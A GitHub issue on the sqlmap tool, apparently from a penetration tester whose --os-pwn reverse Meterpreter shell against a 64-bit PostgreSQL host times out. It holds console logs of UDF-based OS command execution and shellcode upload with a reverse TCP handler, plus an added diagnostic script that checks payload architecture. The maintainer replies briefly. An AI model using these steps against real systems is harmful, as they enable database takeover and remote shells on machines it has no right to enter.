sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Ubuntu x64 --os-pwn fail #2787

Closed juushya closed 7 years ago

juushya commented 7 years ago

Target OS: Ubuntu x64 fresh install
DB: postgresql
sqlmap: current version

It is possible to execute OS commands via --os-cmd.

---
[09:23:44] [INFO] testing PostgreSQL
[09:23:44] [INFO] confirming PostgreSQL
[09:23:44] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache, PHP 5.4.36
back-end DBMS: PostgreSQL
[09:23:44] [INFO] testing if current user is DBA
[09:23:44] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[09:23:47] [INFO] checking if UDF 'sys_eval' already exist
[09:23:47] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[09:23:49] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                
[09:23:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[09:23:50] [INFO] the local file '/tmp/sqlmapeOrWpa12055/lib_postgresqludf_sys6PjOyJ.so' and the remote file '/tmp/libsubmb.so' have the same size (6152 B)
[09:23:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[09:23:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=1001(postgres) gid=1001(postgres) groups=1001(postgres)'
[09:23:51] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] 
do you want to remove UDF 'sys_exec'? [Y/n] 
[09:23:54] [INFO] database management system cleanup finished
[09:23:54] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
[09:23:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.26.169'

[*] shutting down at 09:23:54

However, when using --os-pwn to get a shell (reverse/bind, regular/Meterpreter), I find that the payload used by sqlmap is linux/x86/. The payload gets uploaded to the target's /tmp/ successfully, but getting a shell connection fails.

---
[08:43:48] [INFO] testing PostgreSQL
[08:43:48] [INFO] confirming PostgreSQL
[08:43:48] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache, PHP 5.4.36
back-end DBMS: PostgreSQL
[08:43:48] [INFO] testing if current user is DBA
[08:43:48] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[08:43:50] [INFO] checking if UDF 'sys_bineval' already exist
[08:43:50] [INFO] checking if UDF 'sys_exec' already exist
[08:43:51] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                
[08:43:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[08:43:52] [INFO] the local file '/tmp/sqlmapQEjTbS94612/lib_postgresqludf_syscvT3XS.so' and the remote file '/tmp/libsmsvc.so' have the same size (6152 B)
[08:43:52] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[08:43:52] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 2
[08:43:55] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.26.161' (detected)] 
which local port number do you want to use? [36571] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 2
[08:44:04] [INFO] creation in progress ........ done
[08:44:12] [INFO] uploading shellcodeexec to '/tmp/tmpsezogf'
[08:44:13] [INFO] the local file '/tmp/sqlmapQEjTbS94612/shellcodeexec_WNwvg.x64' and the remote file '/tmp/tmpsezogf' have the same size (5160 B)
[08:44:13] [INFO] shellcodeexec successfully uploaded
[08:44:13] [INFO] running Metasploit Framework command line interface locally, please wait..
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       =[ metasploit v4.15.2-dev                          ]
+ -- --=[ 1669 exploits - 968 auxiliary - 294 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 36571
LHOST => 192.168.26.161
[*] Started reverse TCP handler on 192.168.26.161:36571 
[*] Starting the payload handler...
[08:44:24] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[08:46:13] [CRITICAL] timeout occurred while attempting to open a remote session

[*] shutting down at 08:46:13

I have tried different bind & reverse payloads on different ports. Am I missing something here?
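The two logs above show the mismatch that explains the timeout: the staged helper is the 64-bit build (`shellcodeexec_WNwvg.x64`), while msfconsole is handed `linux/x86/meterpreter/reverse_tcp`, i.e. 32-bit shellcode. The script below is an added example, not code from sqlmap or from the issue author; it audits a saved `--os-pwn` log for that mismatch and, if the local copy of the staged binary is still in sqlmap's temp directory, confirms its bitness from the ELF header. It assumes sqlmap names the helper `shellcodeexec_<random>.x32` / `.x64` (only the `.x64` suffix is visible in the log, so `.x32` is an assumption) and that the payload path starts with `linux/x86/` or `linux/x64/`. The sample log lines and ELF headers are constructed inline.

```python
import re
import struct

# ELF header constants from the ELF specification.
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB = 1
EM_386, EM_X86_64 = 3, 62


def elf_arch(data: bytes) -> str:
    """Classify an ELF image as 'x86' or 'x64' from its first 20 header bytes."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    fmt = "<H" if ei_data == ELFDATA2LSB else ">H"
    # e_type sits at offset 16, e_machine at offset 18 (both 2 bytes).
    e_machine = struct.unpack_from(fmt, data, 18)[0]
    if ei_class == ELFCLASS32 and e_machine == EM_386:
        return "x86"
    if ei_class == ELFCLASS64 and e_machine == EM_X86_64:
        return "x64"
    raise ValueError(f"unsupported ELF class/machine: {ei_class}/{e_machine}")


def payload_arch(payload: str) -> str:
    """Map a Metasploit payload path (e.g. linux/x86/meterpreter/reverse_tcp) to 'x86' or 'x64'."""
    m = re.match(r"linux/(x86|x64)/", payload)
    if not m:
        raise ValueError(f"not a Linux x86/x64 payload: {payload}")
    return m.group(1)


def audit_os_pwn_log(lines):
    """Find the shellcodeexec variant sqlmap uploaded and the PAYLOAD it passed to
    msfconsole; return (exec_arch, payload_arch, compatible).
    Assumption: the helper is named shellcodeexec_<random>.x32 or .x64."""
    exec_arch = pay_arch = None
    for line in lines:
        m = re.search(r"shellcodeexec_\w+\.(x32|x64)'", line)
        if m:
            exec_arch = "x86" if m.group(1) == "x32" else "x64"
        m = re.search(r"PAYLOAD => (\S+)", line)
        if m:
            pay_arch = payload_arch(m.group(1))
    if exec_arch is None or pay_arch is None:
        raise ValueError("log lacks the shellcodeexec upload line or the PAYLOAD line")
    return exec_arch, pay_arch, exec_arch == pay_arch


# Constructed sample: the two relevant lines from the failing run above.
SAMPLE_LOG = [
    "[08:44:13] [INFO] the local file '/tmp/sqlmapQEjTbS94612/shellcodeexec_WNwvg.x64' "
    "and the remote file '/tmp/tmpsezogf' have the same size (5160 B)",
    "PAYLOAD => linux/x86/meterpreter/reverse_tcp",
]

# Constructed sample ELF headers: ET_EXEC, little-endian, x86_64 and i386.
SAMPLE_ELF64 = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + b"\x00" * 8 + struct.pack("<HH", 2, EM_X86_64)
SAMPLE_ELF32 = ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0]) + b"\x00" * 8 + struct.pack("<HH", 2, EM_386)


if __name__ == "__main__":
    exec_arch, pay_arch, ok = audit_os_pwn_log(SAMPLE_LOG)
    print(f"shellcodeexec: {exec_arch}, payload: {pay_arch}, compatible: {ok}")
    print("sample ELF64 ->", elf_arch(SAMPLE_ELF64), "| sample ELF32 ->", elf_arch(SAMPLE_ELF32))
```

On a real run, read the local `shellcodeexec_*.x64` file from the `/tmp/sqlmap...` directory named in the log (it is removed when sqlmap exits, so copy it first) and pass its bytes to `elf_arch`; a 64-bit loader running 32-bit shellcode cannot produce a session, which is what the `timeout occurred while attempting to open a remote session` line reflects.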

stamparm commented 7 years ago

Duplicate of #2173. I'll eventually do this. The problem is the transferring and running of x64 shellcode. Please read the comments there to learn about the issue.